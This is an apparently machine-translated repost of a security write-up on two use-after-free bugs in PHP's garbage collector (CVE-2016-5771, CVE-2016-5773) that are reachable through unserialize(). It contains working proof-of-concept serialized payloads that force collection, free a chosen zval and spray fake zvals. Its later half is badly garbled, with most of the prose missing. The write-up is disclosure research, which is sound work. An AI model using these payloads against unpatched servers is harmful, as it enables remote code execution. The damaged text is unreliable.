📜 ⬆️ ⬇️

We break garbage collection and deserialization in PHP



Hey, PHP, these variables look like trash, okay?
Not? Well, look again ...

tl; dr:
We found two use-after-free vulnerabilities in the garbage collection algorithm in PHP:
')

Vulnerabilities can be remotely applied through the PHP de-serialization function. Using them, we found RCE on pornhub.com, for which we received a prize of $ 20,000, plus $ 1,000 for each of the two vulnerabilities from the Internet Bug Bounty committee on Hackerone .

While testing Pornhub, we found two critical leaks in the SM algorithm ( How we broke PHP, hacked Pornhub and earned $ 20,000 ). We are talking about two important use-after-free vulnerabilities that manifest themselves in the interaction of the CM algorithm with certain PHP objects. They lead to far-reaching consequences, such as using deserialization to remotely execute code on the target system. In the article we will look at these vulnerabilities.

After fuzzing deserialization and analyzing interesting cases, we identified two proofs of the possibility of use-after-free vulnerabilities. If you are interested in how we came to them, then read the material on the link . One example:

$serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}'; $outer_array = unserialize($serialized_string); gc_collect_cycles(); $filler1 = "aaaa"; $filler2 = "bbbb"; var_dump($outer_array); // Result: // string(4) "bbbb" 

Perhaps you think that the result will be something like this:

 array(1) { //   [1]=> object(ArrayObject)#1 (1) { ["storage":"ArrayObject":private]=> array(2) { //   [1]=> //     [2]=> //     } } } 

In any case, after the execution, we see that the external array (referred to by $outer_array ) is released, and its zval is overwritten by zval'om $filler2 . And as a result, we get bbbb . The following questions arise:


Looks like all the magic happens in the gc_collect_cycles function, which calls the PHP garbage collector. We need to better understand it in order to deal with this mysterious example.

Content

PHP garbage collection


In earlier versions of PHP, it was not possible to cope with memory leaks due to circular references. The CM algorithm appeared in PHP 5.3.0 ( PHP manual - Collecting Cycles ). The collector is active by default, it can be initiated using the zend.enable_gc setting in php.ini .

Note: we need basic knowledge of PHP internals, memory management, and things like zval and reference counting. If you do not know what it is, then first read the basics: PHP Internals Book - Basic zval structure and PHP Internals Book - Memory managment .

Cyclical links


To understand the essence of circular references, consider an example:

 $test = array(); $test[0] = &$test; unset($test); 

Since $test refers to itself, its reference count is 2. But even if you unset($test) and the count equals 1, the memory will not be released: a leak will occur. To solve this problem, the PHP developers created the CM algorithm in accordance with the IBM “ Concurrent Cycle Collection in Reference Counted Systems ”.

Initiating the collector


The main implementation is available here: Zend / zend_gc.c . Each time zval is destroyed, that is, when it is reset (unset), the CM algorithm is used, which checks whether it is an array or an object. All other data types (primitives) cannot contain circular references. The check is implemented by calling the function gc_zval_possible_root . Any such potential zval is called root and is added to the gc_root_buffer list.

These steps are repeated until one of the following conditions is met:


Algorithm for marking a graph for cyclic collection (Graph Marking Algorithm for Cycle Collection)


The CM algorithm is a graph labeling algorithm applied to the current graph structure. Nodes of the graph are zval'y like arrays, lines or objects. Ribs are links / links between zval'ami.

For marking nodes, the algorithm mostly uses the following colors:


To understand the algorithm, take a look at its implementation. Garbage collection is performed in gc_collect_cycles :

 "Zend/zend_gc.c" [...] ZEND_API int gc_collect_cycles(TSRMLS_D) { [...] gc_mark_roots(TSRMLS_C); gc_scan_roots(TSRMLS_C); gc_collect_roots(TSRMLS_C); [...] /* Free zvals */ p = GC_G(free_list); while (p != FREE_LIST_END) { q = p->u.next; FREE_ZVAL_EX(&p->z); p = q; } [...] } 

This function takes care of the following four simple operations:

  1. gc_mark_roots(TSRMLS_C) : apply zval_mark_grey to all magenta elements in gc_root_buffer . With respect to the current zval, zval_mark_grey does the following:
    • - returns if zval is already marked gray;
    • - marks zval with gray;
    • - gets all child zval's (only if the current zval is an array or an object);
    • - decrements the reference counts of the child zvals to 1 and calls the zval_mark_grey .

    In general, at this stage, the root and other available zval'y are marked gray, all these zval are decremented reference counts.
  2. gc_scan_roots (TSRMLS_C): applies zval_scan (unfortunately, does not call zval_mark_white) to all elements in gc_root_buffer. With respect to the current zval, zval_scan does the following:
    - returns if zval is not gray;
    - if the reference count is greater than zero, calls zval_scan_black (unfortunately, zval_mark_black is not called). In fact, zval_scan_black cancels all actions previously performed by zval_mark_grey to all counters, and marks all available zvals with black;
    - the current zval is marked white, and zval_scan is applied to all child zvals (only if the current zval is an array or an object).
    In general, at this stage, it is determined which of the gray zvals should now be marked with black or white.
  3. gc_collect_roots(TSRMLS_C) : all white zval link counters are restored. They are also added to the gc_zval_to_free list, equivalent to the gc_free_list list.
  4. Finally, all gc_free_list elements, i.e., marked with white, are released.

This algorithm identifies and releases all elements of circular references, first marking them with white, then collecting and freeing them. A more detailed analysis of the implementation revealed the following potential conflicts:


POC analysis


Armed with new knowledge about the garbage collector, we can re-analyze the example with the detected vulnerability. Call the following serialized string:

 $serialized_string = 'a:1:{i:1;C:11:"ArrayObject":37:{x:i:0;a:2:{i:1;R:4;i:2;r:1;};m:a:0:{}}}'; 

Using gdb, we can use the standard for PHP 5.6 .gdbinit , as well as a custom routine for dumping the contents of the garbage collector buffer.

 define dumpgc set $current = gc_globals.roots.next printf "GC buffer content:\n" while $current != &gc_globals.roots printzv $current.u.pz set $current = $current.next end end 

Now set the breakpoint in the gc_mark_roots and gc_scan_roots to see the status of all relevant reference counters.

We need to find the answer to the question: why is the external array freed? Load the php process into gdb, set breakpoints and execute the script.

 (gdb) r poc1.php [...] Breakpoint 1, gc_mark_roots () at [...] (gdb) dumpgc GC roots buffer content: [0x109f4b0] (refcount=2) array(1): { // outer_array 1 => [0x109d5c0] (refcount=1) object(ArrayObject) #1 } [0x109ea20] (refcount=2,is_ref) array(2): { // inner_array 1 => [0x109ea20] (refcount=2,is_ref) array(2): // reference to inner_array 2 => [0x109f4b0] (refcount=2) array(1): // reference to outer_array } 

As you can see, after deserialization, both arrays (internal and external) are added to the garbage collector buffer. If we continue and stop at gc_scan_roots , we get the following states of reference counters:

 (gdb) c [...] Breakpoint 2, gc_scan_roots () at [...] (gdb) dumpgc GC roots buffer content: [0x109f4b0] (refcount=0) array(1): { //   1 => [0x109d5c0] (refcount=0) object(ArrayObject) #1 } 

gc_mark_roots really decremented all counters to zero. Therefore, these nodes in the following steps can be marked white and later released. But the question arises: why in the first case, the counters were reset?

Debugging unexpected behavior


Let's go step by step through the gc_mark_roots and zval_mark_grey to understand what is happening.

  1. zval_mark_grey applied to outer_array (remember that outer_array added to the garbage collection buffer).
  2. outer_array marked gray, and all its descendants are extracted. In our case, outer_array only one descendant:
    “object(ArrayObject) #1” (refcount = 1).
  3. The reference count of the child or ArrayObject decremented:
    “object(ArrayObject) #1” (refcount = 0).
  4. zval_mark_grey applied to an ArrayObject .
  5. This object is marked gray, and all its descendants are extracted. In this case, these include references to inner_array and outer_array .
  6. The reference counts for both descendants, i.e., for both zvals that are referenced, are decremented:
    Outer_array (refcount = 1) and inner_array (refcount = 1).
  7. zval_mark_grey applied to outer_array without any effect, because outer_array is already grayed out (it was processed in the second stage).
  8. zval_mark_grey applied to inner_array. It is marked gray, and all its children are extracted. Children are the same as in the fifth stage.
  9. The reference counts of both descendants are decremented again :
    “Outer_array” (refcount = 0) and “inner_array” (refcount = 0).
  10. More zval'ov left, zval_mark_grey interrupted.

So, the links contained in inner_array or ArrayObject are decremented twice ! This is definitely an unexpected behavior, because any link must be decremented one time. In particular, the eighth stage should not be at all, because all elements have already been processed and marked earlier, at the sixth stage.

Note: the labeling algorithm assumes that each element can have only one parent element. Obviously, in this case, this assumption is wrong.

So why can one element be returned as a child of two different parents?

One descendant of two different parents?


To answer this question, you need to examine how child zvals are extracted from parent objects:

 "Zend/zend_gc.c" [...] static void zval_mark_grey(zval *pz TSRMLS_DC) { [...] if (Z_TYPE_P(pz) == IS_OBJECT && EG(objects_store).object_buckets) { if (EXPECTED(EG(objects_store).object_buckets[Z_OBJ_HANDLE_P(pz)].valid && (get_gc = Z_OBJ_HANDLER_P(pz, get_gc)) != NULL)) { [...] HashTable *props = get_gc(pz, &table, &n TSRMLS_CC); [...] } 

If the processed zval is an object, the function will call the get_gc special handler. It must return a hash table with all descendants. After further debugging, I discovered that this leads to the spl_array_get_properties call:

 "ext/spl/spl_array.c" [...] static HashTable *spl_array_get_properties(zval *object TSRMLS_DC) /* {{{ */ { [...] result = spl_array_get_hash_table(intern, 1 TSRMLS_CC); [...] return result; } 

In general, the hash table of the ArrayObject internal array is ArrayObject . The error is that it is used in two different contexts when the algorithm tries to gain access:


It may seem to you that at the first stage something is missed, because returning the inner_array hash table is almost the same as processing at the first stage, when it should be marked in gray, therefore inner_array should not be processed again in the second stage!

Therefore, the question arises: why was the inner_array not grayed out at the first stage? Let's look again at how zval_mark_grey retrieves the descendants of the parent object:

 HashTable *props = get_gc(pz, &table, &n TSRMLS_CC); 

This method should call the object's garbage collection function. It looks like this:

 "ext/spl/php_date.c" [...] static HashTable *date_object_get_gc(zval *object, zval ***table, int *n TSRMLS_DC) { *table = NULL; *n = 0; return zend_std_get_properties(object TSRMLS_CC); } 

As you can see, the returned hash table should contain only its own object properties. It also stores the parameter zval'a table , which is passed by reference and is used as the second "return parameter". This zval must contain all the zvals referenced by the object in other contexts. For example, all objects / zval'y can be stored in SplObjectStorage .

For our particular script with ArrayObject we can expect that the zval table will contain an inner_array . Then why is spl_array_get_gc called instead of spl_array_get_properties ?

Missing assembly function and its consequences


The answer is simple: spl_array_get_gc does not exist! PHP developers have forgotten to implement the garbage collection function for ArrayObjects . But it still does not explain why spl_array_get_properties is spl_array_get_properties . To find out, let's deal with the initialization of objects in general:

 "Zend/zend_object_handlers.c" [...] ZEND_API HashTable *zend_std_get_gc(zval *object, zval ***table, int *n TSRMLS_DC) /* {{{ */ { if (Z_OBJ_HANDLER_P(object, get_properties) != zend_std_get_properties) { *table = NULL; *n = 0; return Z_OBJ_HANDLER_P(object, get_properties)(object TSRMLS_CC); [...] } 

The standard behavior of the missing garbage collection function depends on the get_properties object's own method, if specified.

Fuh, it seems we have found the answer to the first question. The main cause of the vulnerability is that there is no garbage collection function for ArrayObjects .

Oddly enough, it appeared in PHP 7.1.0 alpha2 almost immediately after the release. It turns out that all versions of PHP ≥ 5.3 and PHP <7 are vulnerable. Unfortunately, as we will see later, this bug cannot be initiated during deserialization without additional gestures. So later I had to prepare the possibility of using an exploit. From now on, we will call the vulnerability a “double-decrement bug.” It is described here: PHP Bug - ID 72433 - CVE-2016-5771 .

Solving problems with remote execution


We still need to get answers to two of the three initial questions. Let's start with this: is it really necessary to manually call gc_collect_cycles ?

Initiating a collector during deserialization


At first, I strongly doubted that we would be able to initiate the collector. However, as mentioned above, there is a way to automatically call the garbage collector - when the limit of the garbage buffer by the number of potential root elements is reached. I came up with this method:

 define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000); define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5); $overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS); $trigger_gc_serialized_string = 'a:'.(NUM_TRIGGER_GC_ELEMENTS).':{'.$overflow_gc_buffer.'}'; unserialize($trigger_gc_serialized_string); 

If you look at the gdb described above, you will see that gc_collect_cycles indeed called. This trick only works because deserialization allows you to transfer the same index many times (in this example, index 0). When reusing an array index, the reference count of the old element must be decremented. To do this, the deserialization process calls zend_hash_update , which calls the destructor of the old element.

Each time zval is destroyed, the CM algorithm is applied. This means that all created arrays will fill the garbage buffer until it overflows, after which gc_collect_cycles will be called.

Incredible news! We do not need to manually initiate the garbage collection procedure on the target system. Unfortunately, a new, even more difficult problem has arisen.

Deserialization - tough opponent


At the moment, the question remains unanswered: even if during deserialization we can call the collector, will the double decrement bug still work in the context of deserialization?

After testing, we quickly came to the conclusion that the answer is no. This is a consequence of the fact that the values ​​of the reference counters of all elements during deserialization are higher than after it . The deserializer keeps track of all deserializable elements so that links can be customized. All these entries are stored in the var_hash list. And when deserialization comes to an end, the records are destroyed using the var_destroy function.

In this example, you can see for yourself the problem of large reference counters:

 $reference_count_test = unserialize('a:2:{i:0;i:1337;i:1;r:2;}'); debug_zval_dump($reference_count_test); /* Result: array(2) refcount(2){ [0]=> long(1337) refcount(2) [1]=> long(1337) refcount(2) } */ 

The counter of the integer zval'a 1337 after deserialization is equal to 2. By setting the breakpoint until the deserialization stops (for example, in the var_destroy call) and var_hash contents of the var_hash , we will see the following counter values:

 [0x109e820] (refcount=2) array(2): { 0 => [0x109cf70] (refcount=4) long: 1337 1 => [0x109cf70] (refcount=4) long: 1337 } 

The double decrement bug allows us to decrement the counter of any selected item twice. However, as we can see from these numbers, for each additional reference assigned to any element, we have to pay by increasing the reference count by 2.

Lying in sleeplessness at four in the morning and thinking about all these problems, I finally remembered one important thing: the ArrayObject function takes a reference to another array for initialization. That is, if you deserialize ArrayObject , you can simply refer to any array that is already deserialized. This allows decrementing all records of a specific hash table twice. The sequence of actions is as follows:


Using this instruction, we can manipulate the labeling algorithm to process all the links in the Y array twice. But, as mentioned above, creating the link will result in the reference counter increasing by 2 during deserialization. So double-processing the link will be equivalent to as if we initially ignored the link. The trick is to add the following item to our sequence:


When the labeling algorithm goes to the second ArrayObject , it starts decrementing all references in the Y array for the third time. Now we can get the negative delta of the reference counter and reset the counter of any target zval!

Since these ArrayObject are used for decrementing counters, I will now call them DecrementorObject .

Unfortunately, even after we managed to reset the counter of any target zval, the CM algorithm does not release them ...

Destroying evidence of reference count decrement


After lengthy debugging, I discovered a key problem with the above sequence of actions. I assumed that, as soon as the node is marked white, it is finally released. But it turned out that the white knot could later be marked black again.

:


, - . , DecrementorObject ' zval_mark_grey . , :

  array( ref_to_X, ref_to_X, DecrementorObject, DecrementorObject) ----- ------------------------------------ /* | | target_zval each one is initialized with the X contents of array X */ 

, DecrementorObject ' . , , gc_mark_roots zval'. :

 define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000); define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5); //   . $overflow_gc_buffer = str_repeat('i:0;a:0:{}', NUM_TRIGGER_GC_ELEMENTS); // decrementor_object        ($free_me). $decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}'; //          $free_me (id=3). $target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;'; //   , . . ,       . $free_me = 'a:7:{'.$target_references.'i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.'}'; //   2    decrementor_object. $adjust_rcs = 'i:99;a:3:{i:0;r:8;i:1;r:12;i:2;r:16;}'; //       . $trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}'; //        . $payload = 'a:2:{'.$trigger_gc.'i:0;r:3;}'; var_dump(unserialize($payload)); /* Result: array(1) { [0]=> int(140531288870456) } */ 

, gc_collect_roots ! ( $free_me ) , , .

Why did it happen so?

  1. , — . , — .
  2. zval'. , 'i:0;a:0:{}'. zval', 'i:0;', , . , '[…]i:0;a:0:{} X i:0;a:0:{} X i:0;a:0:{}[…]', X . , .
  3. zval. , var_destroy , . . zval' — — .

. , , — , .

.


zval'. . :


, POC:

 define("GC_ROOT_BUFFER_MAX_ENTRIES", 10000); define("NUM_TRIGGER_GC_ELEMENTS", GC_ROOT_BUFFER_MAX_ENTRIES+5); //    zval',     . $fake_zval_string = pack("Q", 1337).pack("Q", 0).str_repeat("\x01", 8); $encoded_string = str_replace("%", "\\", urlencode($fake_zval_string)); $fake_zval_string = 'S:'.strlen($fake_zval_string).':"'.$encoded_string.'";'; //  «» : // TRIGGER_GC;FILL_FREED_SPACE;[...];TRIGGER_GC;FILL_FREED_SPACE $overflow_gc_buffer = ''; for($i = 0; $i < NUM_TRIGGER_GC_ELEMENTS; $i++) { $overflow_gc_buffer .= 'i:0;a:0:{}'; $overflow_gc_buffer .= 'i:'.$i.';'.$fake_zval_string; } // decrementor_object        ($free_me). $decrementor_object = 'C:11:"ArrayObject":19:{x:i:0;r:3;;m:a:0:{}}'; //          $free_me (id=3). $target_references = 'i:0;r:3;i:1;r:3;i:2;r:3;i:3;r:3;'; //   , . . ,       . $free_me = 'a:7:{i:9;'.$decrementor_object.'i:99;'.$decrementor_object.'i:999;'.$decrementor_object.$target_references.'}'; //   2    decrementor_object. $adjust_rcs = 'i:99999;a:3:{i:0;r:4;i:1;r:8;i:2;r:12;}'; //       . $trigger_gc = 'i:0;a:'.(2 + NUM_TRIGGER_GC_ELEMENTS*2).':{i:0;'.$free_me.$adjust_rcs.$overflow_gc_buffer.'}'; //        . $stabilize_fake_zval_string = 'i:0;r:4;i:1;r:4;i:2;r:4;i:3;r:4;'; $payload = 'a:6:{'.$trigger_gc.$stabilize_fake_zval_string.'i:4;r:8;}'; $a = unserialize($payload); var_dump($a); /* Result: array(5) { [...] [4]=> int(1337) } */ 

, .

. , . , «» 20 % 'i:0;a:0:{}'.

Use-after-free ZipArchive


, , PHP Bug – ID 72434 – CVE-2016-5773 . : ZipArchive. , .

zval' , ( ) .

. , php_zip_get_properties . - . :

 $serialized_string = 'a:1:{i:0;a:3:{i:1;N;i:2;O:10:"ZipArchive":1:{s:8:"filename";i:1337;}i:1;R:5;}}'; $array = unserialize($serialized_string); gc_collect_cycles(); $filler1 = "aaaa"; $filler2 = "bbbb"; var_dump($array[0]); /* Result: array(2) { [1]=> string(4) "bbbb" [...] */ 

, zval', . , :

[...] i:1;N; [...] s:8:"filename";i:1337; [...] i:1;R:REF_TO_FILENAME; [...]

NULL 1, . “i:1;REF_TO_FILENAME; […] s:8:”filename”;i:1337; […]”. , zval' “filename” , - .

Conclusion


. , . . , , .

PHP-: . , . . : , .

, , . , , PHP. , : , JSON.

, pornhub.com. PHP .

image
zval' - .

Source: https://habr.com/ru/post/308242/


All Articles